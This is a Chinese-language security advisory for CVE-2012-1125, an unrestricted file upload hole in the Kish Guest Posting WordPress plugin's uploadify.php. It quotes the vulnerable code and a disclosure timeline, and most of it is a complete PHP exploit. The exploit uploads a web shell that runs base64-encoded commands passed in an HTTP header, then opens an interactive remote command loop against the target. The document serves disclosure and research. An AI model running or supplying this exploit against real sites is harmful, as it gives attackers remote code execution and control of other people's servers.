WordPress Guest Posting插件'uploadify.php'任意文件上传漏洞


发布日期:2012-01-23
更新日期:2012-10-16

受影响系统:
kish kish-guest-posting 1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51638
CVE ID: CVE-2012-1125

WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。

Kish Guest Posting plugin 1.2 for WordPress之前版本内的uploadify/scripts/uploadify.php存在不明细节文件上传漏洞,远程攻击者通过上传带有PHP扩展名的文件,然后通过文件夹参数指定目录内的文件直接请求,利用此漏洞执行任意代码。

<*来源:EgiX (n0b0d13s@gmail.com)
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php

/*
    --------------------------------------------------------------------------------
    Wordpress Kish Guest Posting Plugin 1.0 (uploadify.php) Unrestricted File Upload
    --------------------------------------------------------------------------------
   
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....: http://kishpress.com/guest-posting-plugin/
   
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
   
    [-] vulnerable code in /uploadify/scripts/uploadify.php
   
    26.    if (!empty($_FILES)) {
    27.        $tempFile = $_FILES['Filedata']['tmp_name'];
    28.        $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    29.        $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    30.        // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    31.        // $fileTypes  = str_replace(';','|',$fileTypes);
    32.        // $typesArray = split('\|',$fileTypes);
    33.        // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    34.       
    35.        // if (in_array($fileParts['extension'],$typesArray)) {
    36.            // Uncomment the following line if you want to make the directory if it doesn't exist
    37.            // mkdir(str_replace('//','/',$targetPath), 0755, true);
    38.           
    39.            move_uploaded_file($tempFile,$targetFile);
    40.            echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    41.        // } else {
    42.        //    echo 'Invalid file type.';
    43.        // }
    44.    }
   
    Restricted access to  this script isn't properly realized,  so an attacker might  be able to upload
    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
   
    [-] Disclosure timeline:
   
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Vendor notified through http://kish.in/contact-me/
    [07/01/2012] - No response from vendor, notified again via email
    [16/01/2012] - After four weeks still no response
    [23/01/2012] - Public disclosure
   
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");

    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+----------------------------------------------------------------------------------+";
print "\n| Wordpress Kish Guest Posting Plugin 1.0 Unrestricted File Upload Exploit by EgiX |";
print "\n+----------------------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /wordpress/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  = "POST {$path}wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php?folder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
   
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");

$packet  = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
   
while(1)
{
    print "\nkish-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

kish
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kish.in/tag/kish-guest-posting/

相关内容